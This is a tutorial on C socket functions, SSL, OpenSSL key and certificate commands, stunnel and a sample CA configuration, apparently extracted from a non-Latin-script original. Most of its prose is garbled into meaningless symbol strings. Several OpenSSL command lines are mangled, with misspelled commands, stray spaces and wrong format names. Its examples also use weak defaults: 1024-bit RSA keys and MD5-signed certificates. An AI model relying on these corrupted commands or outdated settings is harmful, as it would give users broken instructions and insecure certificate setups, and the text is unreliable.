:3 - 5< X ,G 3 2 C 5/ 0, N I a , ( P- B ' + & B( ' Int recv from (int sockfd, void buf, int len, unsigned int flags, struct sockaddr_ from, int_ from len ); 0 ,6 3 -, @ H %. ?@ F socket () + ' 6- ( % ! L* I'/ " a Sockfd … B . h @ a Buf … 0 _ S / ] < ' , 4 T 9 a Len … ) ,< ?@ 3 5< ) I ,P socaddr \ " ` a From … 7 4 h @ ) IP h @ 7 L* ?@ % ! 8PH C 0, 0, 0 A" 4 -, I ?@ % ! 42 0 -,< ' Y ?@ a Flag … ` T 9 a Len … ,G & + 2 0 / 56 , ' a #P < #P< , 0 63i 6 6 N + @2 5 " , Y+ -,< 'G 5 3 6- 0, + 6, @ " g ),Y a getpeename() + include<sys/socket.h> int getpeername(int sockfd, struct sockaddr_addr, int_addrlen); ) 47 4 h @ ) IP h @ % < $% -, < = G % •7 + 2 M 9 6 6, + 2 " - Y 4 0, 5 z * ^P % M 9 a I 2 0 -,< = G ?@ 0,< ,6 3 4 % 3 8P C H sockdaddr \ " M 9 7 4 h @ ) IP h @ % ! .sockaddr u ) , 6 3 _…w] , ` l '+ n 9" @ C5 / , ?@ , A 'U LE \ " 5 < 2 < 0, : Sockdf … ` a Addr … b ` T 9 a Addrlen … ' (, ! 7 :3 - 5< errno 0,< ,6 3 I :3 \ h @ ) IP h @ S L* 2#5 ) % ,P ,< - < ?@ # BE 7 7 4 Š j* G gethostname () + ( 2 $, ,6 3 $ < F ?@ ) _ www.ibm.com C 8Q) ?@ IP h @ 5< < ( + 2 2< 2 5 ( a TG < "7 + B( ' #include <unistd.h> int gethostname(char *hostname, size_ ); U4 _ < 7 P ! ] 6 " 0,< ,6 3 - 3• E @ 0 :3 - 5 < % P H , 56errno 0 2 , )- ") ,6 3 Y -, 6 U ) -" / ( , G 0, 5 ) ,L a b. 
3 E < E , )# K 1Q - Y ?@ IP h @ " C 5 e '2# 1) , h @? ! N 8P C H X N56 , 1 ) #B 5! " 9 ) DNS 5F H 5< , DNS @ 5F 0,< ;. ?@ ^P < T 9 a Size … , , %5! l '+ '?@ H) E " " :3 ,< _…w] 0, 5 - Y W 3 2< 2< ( + S / a -" / -, a Hostname … @ -, 6 U ) " B( ' -" / ( h @ , ,@ 2

#include <netdb.h>
struct hostent *gethostbyname(const char *name);

0-, 6 U ) 7 ?@ 3 hostent \ " < a Name … -" / ( ` h @ $+ a , -,< = G "

struct hostent {
    char  *h_name;
    char **h_aliases;
    int    h_addrtype;
    int    h_length;
    char **h_addr_list;
};

8Q C , 6 3 -" / ( < 2 #P< ] 2< ( a Hname … 5 _www.ibm.com _ < , , B'2 #P< 3 wq < 2 ] 2< , <- < ( a H_aliases … G 3 a H_addrtype … N 56] h @ - _0 < ,6 3 AF_INET S / h @ T 9 a H_Length … -, 6 U ) 2< ^ IP h @ ?@ 0 < , ` ), ` I errno < 0, - < u $? &@ - < B PH + M83 ) $? u 0 < ' :3 \ = ‰9 < 2 0 c + &@ ' 7 2 NULL , 7 herror 5 ) X TQ 3 |q ' 7 ,6 3 I I H _ addr_list… < u ?@ H g ) 2 g + 25X F) + 2 H , F ) ,< ,6 * herror() 5 a, H ) +' " F)

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int argc, char *argv[])
{
    struct hostent *h;

    if (argc != 2) {  /* error check the command line */
        fprintf(stderr, "usage: getip address\n");
        exit(1);
    }
    if ((h = gethostbyname(argv[1])) == NULL) {  /* get the host info */
        herror("gethostbyname");
        exit(1);
    }
    printf("Host name  : %s\n", h->h_name);
    printf("IP Address : %s\n", inet_ntoa(*((struct in_addr *)h->h_addr)));
    return 0;
}

E )- ' ) )? ! 0, k F) 3 ) 'b3 ) ( ' Enter , B) < ) IP h @ 7 L* a ? getip -" / ( h @ 7 2 ( ?@ 5F " A" c " 7# 2, l ' 9_=1 13 B ' -" / ( B F U )- Œ aTQ 0, 6 $getip www.ibm.com , IP +H ) h-addr-list u 6) @ #P< , -, < - 3•BE 7 ( Y : ' - < L 1 ) < ?@ T) 1/ F) 3 ) k T G IPh @_O -" / ( h @ 3 |q , < b '5 < , h @ % ,P 7 6 l' 8G' C 0, , " inet_ntoa() + " _pws 0w{q 0w†}žw‹q C 8Q] 0 in_ \ " ` P E 2 ?@ 0 ) )? @ inet_ntoa() + ) ,< = G ?@ 3 -,< •\ nP : • %5!_z %L' , addr 5 3 lY %5! 1 ) 2 5> ) ) 4 " •\ nP: • %5!
0, ' U +\ SSL i ' _Secure Socket Layer^ a – N& 5 3 6 T F 2 7 !89 T P '9 6, ) 6- 0, , < / 9 78# 2 " -,5! %# 5 $ 6- N ?,< nK' " . " , N& P ! 78# 2 0, ' P ! -,5! N& … ? 6? # ) " , 6 & , B) ,B , F ) , ,F 0 6 6 ( ? 21 ) 0, ) ) ?@ c ! 0 * & ( ) " N & A) ) 6 P. % H 6 ) " ?@ () %# F N& … N & , B? , B T P A) 2 %# 7 2 T %# 0, < - 4 1 g CP 6( 6 P . m.1 & 3 b' , F ?@ - 0, F A) 2 F j & " 0,< & A L3 , B ) M 9 " ( u4 , Gœ L3 , B) # & ) -,< B ), , < 2t5: F N& … %#< N& A) 6- . !89 , 6 * ? N ' n 9 @ ? )@ 5! , B " ? N ) , & A ? 59 ? 6? <& , B ) 2 " , T 3 , B) N,56 ) " N ,B ,B 5! , B ) bP 1 < 6 V ? 5! , B ) -, N & A) ) ? , , 6 #P < <) 0-, a" , – 0 2#5 L3 , B 0 < 2 5! , B ?@ , Z> - Y ( u4 ? " 5! , B n P : A) 2 0 < ?@ , * , u4 ,6 * ?@ D B %# A 0 ,B 3 " %# 2 %/ x 0 5! , B k F % / 0,< \, ? 5! N& …p %#< N % H"E g 6 'L ? E/ ? F b ,B & 5! , B -,< T, ) 1 , B" - Y ! 'L ? , -, m .1 ? , B 0, 0 < - U ), 7 !89 % ?@ " - Y ?@ N 7 !89 ? & n 9 " , & 7 !89 N 6 H- Y . … . " I . 0,<P ' N1, @ 7 !89 • & '7 !89 - 56) 'L ? < & -, , B 0A L3 0, & 6- 5 0 % / -, -, < T ' $7) Y 7 L3 , B % ? "@ -, Hash 5 6- , , ' & 0 < - 1E ,4), > 0 ' B ( u4 - 56 5 … 5 " L3 _ 1 E ( u4 ) ? ? 6( u4 Hash /? & ) 1 ?@ Hash + 6 u4 m .1 , < ? # Hash L3 , B ? 56 6 2#5 I , P. > ] < 7) Y Hash g P . -, ' > U 7 ), O / $, 6 ( u4 Hash ' ) 2 ), , ' " -, ' 0 < 6- 5 5!, B 1E " / 6- 5 ) F ) ( 4 n,L … ?@ b 6 L3 , B L. P! ?& ) < , h F n,L F n, L 0 @ F ? "@" - Y , , 1E 6 b F 6 Q 1/ < $ < ( E P! 5B ) 6 5! , B bP ( u4 n, L 0 6 - Y -, < (E 9 ,# c 5G %5! C 0 6- < ( E 6- ™Y/ 6- 4 •A) ) S n, L ( u4 , P 0 F L3 , B 2< ?@ h 5 ) ( u4 n, L +H ) A" F n,L d* , ,F - ()&B) ("c 6) #1 " ? 59 ?& h 5 5 5 0, N,# , A" ( u4 ,P n,L 6 0 -, ! 6 5! , B] , 6 T. 6 ? v ') 3 U) ? 2 4 i: N 1P 0, < 60, b 0 2 6 3 = D) , 6 2 " M, 6, 6 % # S , $? 
@ 6 - E" U) 6 ?@ U) ) _= B* 6 U) 0,< 5 ™Y/ 2 X YD) 6 %3 6 U) F 6 , ?@ -, 6 U) 6 S BB S " U) F 2 0_, , 6 U) - 4] … A W L* 2 ), - , P G< 2 3@ " 6 6 > )( % < 6 > 0 < Z> A 3 a SSL %•) 4 H- Y #P< ) TCP/IP % # ) 4 c c 6- TCP/IP %# ) 4 )T HTTP) LDAP) IMAP , 6% # ) 4 ) 0, < F SSL %# ) 4 …‹ %#< c" c ) 3 6 c" ,6 -" F SSL BH < -,6 l '%#< !89 ) , 5 E , ) F N& 2 T L SSL U) U) M 9) 5! , B ) 6 % BH 2 a SSL -, 6 U ) &'( P! " 0, 5 % 5! , B ,6 -" F -,<, 7 67 P [ … / ? 59 ) N& T U) a, ?# 2 9 ?56 SSL 0, @ ) R 4 ? # & % 5! 2 U #!] , 5 7 P [ SSL 2 `56œ_ ? 2 4 SSL , 6" ,6 # " - Y $ ) 6 ), & , , 0 U) 6 ,6 H 2 `560, 5 % 3 5! % H 6 ), BH 2 a SSL -" F ) / ? 59 & 1 U) 67 P[ 0, 5 , ,6 -" F U) ) ) &'( BH 2 a SSL 2 TL ) 0, 5 1P -,< & 7 ) SSL Record protocol a = G 6- SSL ( u4 1P $ 6( u4 2 %# ) 4 protocol SSL Handshake % # ) 4 " - Y - . & SSL 1P " M, 60, 5 SSL = G 9 P %# ) 4 0, ) ) U) a 0 ?@ M 9 ) 6 9 ) !89 K &F % # ) 4 ) " SSL % # ) 4 -, < % # 'SSL T ? ) U) " M ,6 U) b 6 ) 67 P [ N& N1O * 0, _ 3] ) U) <,B 5! , B , - Y U) < , B) 5! , B N& % " g@ SSL Handshake ( u4 5! , B " - Y <,B 3 ( u4 & U) SSL -" F ) B F 6 ) N & TL N& " 0,< A 3 G F " ? 59 ) 6) 5! , B G U) U & $ 6- ? )@ 67 P[ % < , 9P %# ) 4 P SSL % # ) 4 <,B K ,6, -" F ) E SSL $ 0,6 67 P [ N& " - Y SSL -,< 0, 5 P 4 N& 2t 5: 6 %# ) 4 " '2 0 œ, 5 7 P [ U) & " '2 0 , B 2 0,6 H- Y 0,< a, -,< - )@ " 83 9 %/ 2 'L - T $& " SSL * N1- Y SSL ^ P U) - 5< ) ) U) !89 N ) -,<, 1 0, 5 U) 3 6 U) 6 3 ) -)8! ,< Y T) B / ,< U) !89 & 6, " 0, 5 0, ) 6-, < T N& T L E ?# ) , b T T & !89 " - Y (8! , U) 7P [ ) 6 0, 5 0 ' N1 ( ') F )@ & ) -,< 1P T. & ) 6- 5! , B E T ) 0, 5 ,B -)8! 0, U) T 6, g - Y U) ) G œ, ,< 3 6 ) ,< - 5 3 TL 1 ) , . ,B & F) U) 1 ) . ,B ?@ -,< & 67 P[ 3 ) - 56 -,< Z> ( u4 U) , " - Y ?@ ) - ) 1 ) 67 P [ . 3 U) 6 A 3 L3 , B " ) ) 0, 5 U) 7 2 0, 5 , 5 ,1 1P SSL ? ?@ " - Y ? 59 T T9 B F, B 1 ) . , B" - Y T9 !89 0,< B F 2 `56œ < ( u4 . 2' & ) u" U) ? ) ) ) <,B N& , B 2 " - Y G -,< 1P 7 !89 0 B F, B B ) T 6( u4 ,6 \89 ) 9 P " '2' ? 
4 -, < & u4 B ) ( u4 U G F" % / U) œ,<, 6 3 & 0, 5 0,< 9P " '2 ' ? 4 , ' u4 U) & ) U) 0 SSL -,< <R V < G F " ? 59 ) B F , B ) -, & $? )@ SSL (5 & B F, B 2 " ) 0, 5 6, 2 G g ) $, - Y ,< - U) 5 3 TL , . ,B & 1 ) 9P " ' - Y 67 P[ U) 6 A 3 ) 3 6- ) 0, 5 U) L3 , B " ) 7 0, 5 , 5 ,1 B F, B 1 ) 1P SSL " ? B F ?@ " - Y ? 59 T T9 . , B" - Y T9 !89 0,< 2 `56a < ( u4 U) ? N& ) . 2' u" ) ) ) <,B N& , B 2 " - Y G -, < 1P 7 !89 GF 0 B F, B B 0, 5 T 0,< U) 6( u4 ,6 \89 ) 9P " '2' ? 4 0 , SSL -, < <R V < G F " ? 59 ) & u4 B ) -,< & ( u4 9P " '2' ? 4 $? )@ ' U u4 B F , B ) -, U) U) & B F, B 2 " ) - Y a ) 9 ?560 6 , ) T T 6 ) " , 6 " ) U) 3 6 " - Y U) ) SSL 6, SSL 6, P! ? " 0 Fv s B / +:H 6, 667 P [ U) &'( 0, 5 7 P [ U) U) ) ,< Y SSL 9P " ' ) &'( a, 6 ) SSL 9P " ' (5 & / a,< , 6 3 & 0, 5 " p B / % € 0, 5 ' P Qv 4 " 6 @ PG ) , @ ',< -,< —> A 3 6 0, 6€,< U) 2G 5! % H 6 12 0 6 3 5! % H 6 -, ( 2 0 3 1 & 6 U) ) , - )@ -, 6,<P 6 " ,G ) ), 6 & 6, # ) # ) #1 > " 6 7 !89 ) ,< - : -, < - Y ) , u 6 6 ) 1 5! , B @ : ) # ) #1 > ), ( & b ?@ > L3 , B 6 0,< ,6 * , ) ) 6 -,< +H ) ) U) ( #P < ?56 P Q l '7c (5 a (E * + " 6 2 " - Y 6, B E … CRL ) CSR $ 6 , ( u4 -, # & E SSL Shell n 9 " 0,< DSA ) DH $ RSA x.509 C GH ) openssl 7 # " - Y ? @ v 4 0,< ,6 * OpenSSL 0, ?@ ,6 * & > , , 5! , B " - Y -,< • 6 g 3 6 B / 2 € 0 2 & U) 1 ( 2 ), 0, 5 5! , B , TL 7 ), 6 @ " DN ,B' 1 -, @ 6 < 5 , -, 1SSL 0, 5 'X €, 6 " & 6) ), ?@ N & ), R4 3 5! % H 6 U) ), 6 N1 B ) TLS ) SSL E … P. … & )? U) ? … S/MIME -,< & 6( u4 , … a openssl " ) ) & … ' Openssl command [ command_opts ][ command_args ] 2G - #B 5! \ ,< Y? " – 0, - 56 N - 7 6 @" " - Y & 1/ 6 , ) ;! 2 0 < & U) ? passphrase 2 ? ) ) S F ( 5 ?, E , ) ) ?, < ? - Y 7 passout " (, " 6S 6 " passin R 10, < 0 < 6 , B2 < " passphrase ^ < F? 5 # &' >/ passphrase 5L ?# 2 " - Y 6 & " ' & b passphrase 5B 0 d* , < ? ) _ F) 3 passphrase ) )" ^ a " & ) 2 openssl 4? ! - Y passphrase 7 P! " …pass : passphrase 0 < 0 < - Y passphrase ?, 3 " 0 < - Y ? 
&56 9 ( 5 % < T) L3 , B 6) < ,< passphrase # ? 1/ 2 6 6 ) F ( N6 ] passout- passin S L3 , B -" , - 0, ) # " %P H 6 G ?, 2 0 Y 2 " ? L3 , B 2 " -,< , 1 2 , 3 % L3 , B 2 " - Y F ( N6 < - Y U ) 9 6 2 N M 9 " 0,<P - Y % H ?,< -, " 7 , M 9" 7 passphrase , ^ & ", 2 ( 5 x509 ) genrsa req , rsa " H P 10, $, , 1 CSR 2 U 3b 6 # 0 5 - Y ), 0 < > (E ? , 1 ( N60 < - < 2 0 6 4 PU ) 3 ' ) 0 ),G -,!" - Y ("c SSL ), 0 <- command ,G L3 , B , 5 T 2 < , - Y var :. u , " - env : var pathname % 'T) : " -file : pathname …passout ) …Passin & ) % ' " 0 < passphrase ?, 3 () ) ) passphrase ?, : " ) 3 T) : 0 < - Y passphrase ?, 3 , < number ?@ M G - 5< - Y F) 3 B'" -fd : number 0 < e 'j 4 & " #B 5! 2 < >G - 56 manual 7 .Y -, 3 , ) )" 9 0,< 5 stdin " - Y Passphrase - stdin " x509 ) rep , rsa , genrsa 7 7 2 0 < U4 ,G - 6 5 H iX @ T) , 0 6 F) @ a genres %# < 2 RSA B ( '0 ) L3 , B , 1 2 0,< " Openssl genrsa [-out filename] [-passout arg] [-des] [-des3] [-idea] [-f4] [-3] [-rand file (s)] [numbits] aT) , -out filename < < ?@ F) 3 L3 , B - Y F) 3 % '( & 2 " 0, < -idea − des3 -des & IDEA DES3, DES 0, - Y 6 & 6 d* < stdout N1" # " L3 , B ? -passout arg DES3, DES ? d* a, 0 N1" # " $ <- Y , B ? 0 < numbits 6 - Y & 2 " Šwp ?@ e Y 4 , , 1 passphrase ?), ) IDEA & F) 3 % 'passphrase ›, d* wqp‹ T 9 , BT 9 L3 , B " openssl genrsa - out rsakey. Pem 1024 ) DES3 N1 -, < & wqp‹ T 9 L3 , B a, " , 1 W 3 passphrase openssl ganrsa - out rsakey. Pem - passout pass : enter –pass-here-des 3 1024 a rsa ? 2 " - Y 6, B' , 0 u a,< 0) @ . 0 " %#< RSA 6, B % ,P N ' 2 , B ( '0 5 -,6 2 ' " 6, B , B =B* opinsslrsa[− inf orm PEM NET DER][−outformPEM NET DER][−in filename][− pa sin arg] [−out filename][− passoutarg][−sgckey][−des][−des3][−idea][idea][−text][−noout][− modulus] [−check][− pubin][− pubout] aT) , - inform NER, PEM , , NER, PEM? 
, d* , 2 G L3 , B ) )" F) 3 , B ) ), B % < - Y & 2 " ?@ paaaphrase , < -, < & & ' ) )% ' 0 < - passin arg d * ' PEM ?@ e Y 4 , 0,< DER 0 - infilename , ) ), B PEM ?@ e Y 4 , 0,< DER 0 - outform 2 G 6 & -, 3 ) ),B 0 < - out filename " 0, d* < , -,< < ?@ F) 3 L3 , B F) 3 , B B' - Y & 2 0 < - passout arg d * ?@ passphrase , < -, < & & F) 3 , B 0 < − des − des 3 − idea ? IDEA & DES, DES 6 0, - text 7 -, < , 1/ - noout F) 3 - Y -)8! 0, N1" # " L3 , B L3 , B ' F) 3 & - L3 , B 6,B'-,< , ( ' & 2 " Y 0, < 5 - modulus 0, 0, V4 6D F) 3 L3 , B 6,B' 6D , B modulus 5 H passphrase " Opnssl rsa –in inkey. Pem- passin file: pass- file- out outkey. Pem -, 3 , ) ) " passphrase] , & L3 , B " a_ < openssl rsa- in inkey. Pem –des3 out outkey. Pem a,6 ? L3 , B 7 . " openssl rsa-in inkey. Pem – text - noout a req , B, 1 ?@ " ? a,< , 60 < " %#< 2 - Y CSR , B ( '0 5 - Y & 2 " 6 ) L3 opensslrep[−inf otmPEM DER][−outformPEM[−in filename][− passinarg][−out filename] [− passoutarg][−text][−noot][−noout][−verify][− modulus][−new][−rand file(s)] [−nwkeyrsa: bits][−newkeydsa: fise][−nodes][−key filenane][−keyfotmPEM DER][−keyoutfilename][−[md5 sha1 md2 ]][−configfilename][−x509][−days n] [−asn1− kludge][−newhdr][−extensionssection][−reqextssection] aT) , -inform NER, PEM , , 0 -outform NET, , ) ),B F) 3 CSR 2 G PEM ?@ e Y 4 , 0,< DER d* CSR ) )" ) ) CSR , , % < & ) )% ' - Y ?@ paaaphrase , < -, < & & 2 7 -,< , 1/ -)8! 0, -noout -modulus F) 3 CSR 6 D F) 3 ' d* CSR 6,B' F) 3 6, B'-, < , ( ' & 2 " CSR %3 -, 3 ) ) CSR 0 < -text - ' PEM 0 < -passin arg ' PEM ?@ e Y 4 , 0,< DER , 0 -infilename " 2G 6 & & Y 0, < 5 6D 5!, B modulus 5 H 0, -new 7 !89 ) E < CSR 0 < - Y -, < d * _0 < -newkey rsa: bits CSR -keyout filename E ;! ' , –key & 2 " - Y ) )" & " , B " CSR & " ,1 ,B ,< -, ) PSA L3 , B 0, d* ,B 6 < < ?@ d* ] & 2 " - Y ,G Bits 0 < L3 , B B'( , -x509 E root 6 CSR < F ,1 & 2 d* & 2 " - Y 0 < -days n P! ?& n ,< -,< - Y –x509 6 & " 0, , 1 CSR a, L3 , B d* " - Y " openssl req - new- key key. Pem - out req. 
pem. a, , 1 ? &56 9 CSR ) L3 , B " openssl req - newkey rsa : 1024 – keyout key. Pem – out req. pem. a, , 1 ? &56 9 root 6 ) L3 , B " openssl req –x509- newkey rsa: 1024 – key. Pem- out cert. Pem. x509 B ( '0 < - Y 6 ), & b 6 a,< , 2 " " %#< 2 opensslx509[−informDERPEMNET][−outform DERPEMNET][−keyform DER PEM][−CAformDERPEM][−CAkeyform DERPEM][−infilename ][−outfilenam e] [−hash][−subject ][−issuer][−nameopt ][−enddate ][−purpose ] option][−email][−startdate [−dates][−modulus][− fingerpr int][−alias][−noout][−trustout ][−clrtrust ][−clrreject ] [−addtrust arg][−addreject arg][−daysn][−signkeyfilename ][−x509toreq][−req][−CAfilename ] [−CAkeyfilename ][−CAcreatese rial][−CAserialfilename ][−text][−C][−md2− md5 − shal − mdc2] [−clrext][−extfile][−extfilefilename ][−extensions section] a T) , - inform $PEM , , - outform $PEM , , ' NET F) 3 CSR 2 G ' PEM ?@ e Y 4 , 0,< DER 0 0, -, ) ) CSR 2 G PEM ?@ e Y 4 , 0,< DER 0 - in filename 6 & d* CSR , ) ) CSR 3 % < NET ) )% ' - Y & 2 " 0 < - out filename " 0, d* , CSR -,< < ?@ ) ) CSR ) )" B' - Y & 2 0 < - text 7 -, < , 1/ 0, - nooout CSR F) 3 CSR -)8! ' -, 3 F) 3 6, B' & - 6, B '-,< , ( ' & 2 " - Y 0, < 5 - modulus F) 3 6 5! , B modulus 5 H %3 0, - serial - hash 0, 0, - subject - issuer 6D F) 3 6D F) 3 0, 0, 6D 6 6 S/ 6D F) 3 6D F) 3 6 6D T - 5< ( hash , 6 ( -, S/ ( - email 6 D F) 3 6 S/ # ) #1 4h @ 0, - startdate 0, - enddate - dates 6D z) 3 0, 0, 6D z) 3 6D F) 3 - fingerprint 0, - signkey filename 6 > 6D F) 3 6 < E filename > v ) ), v 1E ;! ' v 6 6 root 6 ), > & 2 " - Y H L3 , B " - Y 0 < - keyfrom , , ) ) L3 , B PEM ?@ e Y 4 , ,< DER 0 - days n d* P! ?& n ,< -,< - Y –x509 6 % , PCSR - Y d* 6 –signkey 2 PEM & " 0, - x509toreq , B " 0, & ' & 2 -,< - L3 0 < - req -, 3 ) )? ! -, 3 ) ) 6 e Y 4 CSR 1/ & 2 " - Y 0 < 0 < - CA filename ? > 6 0 < - Cakey filename " ? - Caserial d* filename 4( " & nB G & 2 b 6 d* ), & 2 b 7 P ! % '2 ( 4 -)8! 
, 6 E ), < & 6CERTICATE T 0srl , - CA createserial d* > 0 < ), 6 - Y L3 , B < - Y ?@ - 5< ) / % ' e Y 4 , 0, & 6certificate T ^ 6 - 5< % ' filename - extfile filename , H ?@ 6extention - Y 0, - extentions sectio & 2 " W 3 extention 6 d* ? )&' 0 < a,6 ? 6 B' 7 !89 - Y " openssl x509 – in cert. Pom-noout-text a,6 ? 6 T - 5< " openssl x509 – in cert. Pom-noout-serial a,6 ? 6 S/ ( " openssl x509 – in cert. Pem – noout-subject a,6 ? 6 1E > " – fingerprint openssl x509 – in cert. Pem – noout % ,P DER a, ' PEM '" 6 " openssl x509 – in cert. Pem – inform PEM – out cert. Der-outform DER a, % ,P CSR 6 " openssl x509 –x509 toreq-in cert. Pom –out req. pem – signkey key. Pem a, % ,Proot 6 CSR " openssl x509 – req-in careq.pom-signkey key. Pem-out cacert.pom > 6 ), & L3 , B ) 6 " - Y CSR " a, openssl x509 –req – in req. pem – CA cacert. Pem – CA key key . pemCacreateserial F) 1/ ) SSL b a -,< & 7 !89 ? ) , #4 ? ! . ? @2 & " H ) ,< " , T) , " U4 - 1/ ) a 2 U) … ], 5 T # , U) 5 -, < - < Stunnel ) ) 6 F) 3 ' ), ,< 6 @ 9 ] ,< -, < & " ' - Y SSL Wrapper \ 2 0 E n 9 2, ? ) I 0_ IMAP ) 6 &'( 7Y SLL 5 SSL 1/ 2 " , ? SSl " - Y ?# 'X ?@ ) ' 6 &'( I 0 _Apache O) ) b' 1/ 2 7 !89 T 6U ) SSL 7 # ) ,< 0 & =B* ' a ' ) ) L3 , B L3 , B ,1 openssl genrsa – out key. Pim 1024 a CSR 0 L3 , B b ?@ ? > a 6 ' ), CSR ? & " - Y CSR ? " ,1 ' > openssl x509 – req – in csr. Pem – signkey key key. Pem – pem – out . pem – days 365 POP3 ) - 56 Stunnel &'( SSL " -,Y - . \ X " POP3 ) ?,< - 56 SSL " - Y a 2#5 n 9 ) 2<) 5 H2 < - iX Stunnel " 0 < - Y 7 4 @)- ,6 A a ' {{Š - 5 < 7 wwq - 5 < 7 4 H ) 6script 7 4" b , 7 !89 Stunnel -, < & 7 !89 2 ) , " 7 Y wwq - 5< 2 0, < A" 4 Stunnel-d995 –p/usr/ local/ssl/certs/stunnnel. Pem – r localhost: 110 U) , )" ' 7 -,< & 7 !89 Stunnel {{Š - 5< 7 4 " 2 0, F -, < & a !89 2 A" H 4 6Script 7 Stunnel-d995 –p /usr/local/ssl/certs/stunnel.pim-l/usr / sbin/imapd ) L3 , B % < S stunnel.pem c % ' , B " , G Stunnel.pem % ' 0, < 0,< < _ -, F) , & ) 7 13 : 6 ] ) ) W 3 L*< ¢ ^P 2 0, , — ) ? 
59 5 < ? 3 IE " , 6 6 , 5 '— " 5< - P< ?# !89 % < , : 56 6 0_ B # %. $ P! 7, $ % 5 h @ $ ( , 56$ - 5 > 7 !89 2 L*< 1 E hash % H 56 ? 4 ) H , > ) 5< '2 F T/ 6 ?@ S/ )h @ 5! , B % < 6 I " - Y ) 6 CA 0 5! - ›, ) > )- R , $O) CA ' 7 !89 7 )&B " 5< @ & L3 0 @^ 2 0, —L*< — 5< , 5 ) R 6 6 ) 1E N 2 2 `560 0,< $, - 5 ^P < ? 59 6 ], 7 !89 ) ), N c 5G 5< " €,< $, 6 ? 59 ) L3 —6 M 9 ?@ — › GH ) @ €, - › '2 ) - ) 6 " ,G & ) a Certificate ? I 6 5< 5! & 5 ' N 56 6 c 5G 0,< C 2 SSL (Certificate Authority) 6> 56 1% < a "7 —6 ¢ 2 * A)

CA.pl -newcert
(openssl req -config /etc/openssl.cnf -new -x509 -keyout newreq.pem \
    -out newreq.pem -days 365)

# b F 6 6 6 0 , ( 5 0, ? 59 % H g 5 <$ 1E u) j -,< > 3 6 0, ?@ 66 6 > " )% HC 8 -, < > $, T 6 6 ) > A 3 \ 2 " 6CA 6 a 6 6 2 " # " 5

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1 (0x1)
        Signature Algorithm: md5WithRSAEncryption
        Issuer: C=FJ, ST=Fiji, L=Suva, O=SOPAC, OU=ICT, CN=SOPAC Root CA/[email protected]
        Not Before: Nov 20 05:47:44 2001 GMT
        Not After : Nov 20 05:47:44 2002 GMT
        Subject: C=FJ, ST=Fiji, L=Suva, O=SOPAC, OU=ICT, CN=www.sopac.org/[email protected]
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (1024 bit)
                Modulus (1024 bit):
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints:
                CA:FALSE
            Netscape Comment:
                OpenSSL Generated Certificate
            X509v3 Subject Key Identifier:
                FE:04:46:ED:A0:15:BE:C1:4B:59:03:F8:2D:0D:ED:2A:E0:ED:F9:2F
            X509v3 Authority Key Identifier:
                keyid:E6:12:7C:3D:A1:02:E5:BA:1F:DA:9E:37:BE:E3:45:3E:9B:AE:E5:A6
                DirName:/C=FJ/ST=Fiji/L=Suva/O=SOPAC/OU=ICT/CN=SOPAC Root CA/Email=administrator@
                serial:00
    Signature Algorithm: md5WithRSAEncryption

nB G 5! , B 0 n: # " ? 59 ,B 6 T ?@ # 0, › 6 , B 0 B . " B . # ] < - Y 6 6 'X R & T -, '-,< , ?@ S/ b -, < -,< > ( 4 F 6 6 b' 2 0 <- , P! $ N 56 2 S/ 7 !89 F " , P & 6, B 2 & ' 56 ) / 6 )/ > ?
") 6 2 N %. - Y GF " , # 3 L3 L3 , B N 7 P ! 6- ) 6 6 , P) $, < R & ( 4b . , )_ L3 a OpenSSL , #4% '

#---Begin---
#
# OpenSSL example configuration file.
# This is mostly being used for generation of certificate requests.
#

RANDFILE = $ENV::HOME/.rnd
oid_file = $ENV::HOME/.oid
oid_section = new_oids

# To use this configuration file with the "-extfile" option of the
# "openssl x509" utility, name here the section containing the
# X.509v3 extensions to use:
# extensions =
# (Alternatively, use a configuration file that has only
# X.509v3 extensions in its main [= default] section.)

[ new_oids ]

# We can add new OIDs in here for use by 'ca' and 'req'.
# Add a simple OID like this:
# testoid1=1.2.3.4
# Or use config file substitution like this:
# testoid2=${testoid1}.5.6

####################################################################
[ ca ]
default_ca = CA_default # The default ca section

####################################################################
[ CA_default ]

dir = /var/ssl # Where everything is kept
certs = $dir/certs # Where the issued certs are kept
crl_dir = $dir/crl # Where the issued crl are kept
database = $dir/index.txt # database index file.
new_certs_dir = $dir/newcerts # default place for new certs.

certificate = $dir/cacert.pem # The CA certificate
serial = $dir/serial # The current serial number
crl = $dir/crl.pem # The current CRL
private_key = $dir/private/cakey.pem # The private key
RANDFILE = $dir/private/.rand # private random number file

x509_extensions = usr_cert # The extentions to add to the cert

# Extensions to add to a CRL. Note: Netscape communicator chokes on V2 CRLs
# so this is commented out by default to leave a V1 CRL.
# crl_extensions = crl_ext

default_days = 365 # how long to certify for
default_crl_days= 7 # how long before next CRL
default_md = sha1 # which md to use.
preserve = no # keep passed DN ordering

# A few difference way of specifying how similar the request should look
# For type CA, the listed attributes must be the same, and the optional
# and supplied fields are just that :-)
policy = policy_match

# For the CA policy
[ policy_match ]
countryName = match
stateOrProvinceName = optional
localityName = match
organizationName = match
organizationalUnitName = optional
commonName = supplied
emailAddress = optional

# For the 'anything' policy
# At this point in time, you must list all acceptable 'object'
# types.
[ policy_anything ]
countryName = optional
stateOrProvinceName = optional
localityName = optional
organizationName = optional
organizationalUnitName = optional
commonName = supplied
emailAddress = optional

####################################################################
[ req ]
default_bits = 1024
default_keyfile = privkey.pem
distinguished_name = req_distinguished_name
attributes = req_attributes
default_md = sha1
x509_extensions = v3_ca # The extentions to add to the self signed cert

# Passwords for private keys if not present they will be prompted for
# input_password = secret
# output_password = secret

# This sets a mask for permitted string types. There are several options.
# default: PrintableString, T61String, BMPString.
# pkix : PrintableString, BMPString.
# utf8only: only UTF8Strings.
# nombstr : PrintableString, T61String (no BMPStrings or UTF8Strings).
# MASK:XXXX a literal mask value.
# WARNING: current versions of Netscape crash on BMPStrings or UTF8Strings
# so use this option with caution!
string_mask = nombstr

# req_extensions = v3_req # The extensions to add to a certificate request

[ req_distinguished_name ]
countryName = Country Name (2 letter code)
countryName_default = FJ
countryName_min = 2
countryName_max = 2

stateOrProvinceName = State or Province Name (full name)
stateOrProvinceName_default = Fiji

localityName = Locality Name (eg, city)
localityName_default = Suva

0.organizationName = Organization Name (eg, company)
0.organizationName_default = SOPAC

# we can do this but it is not needed normally :-)
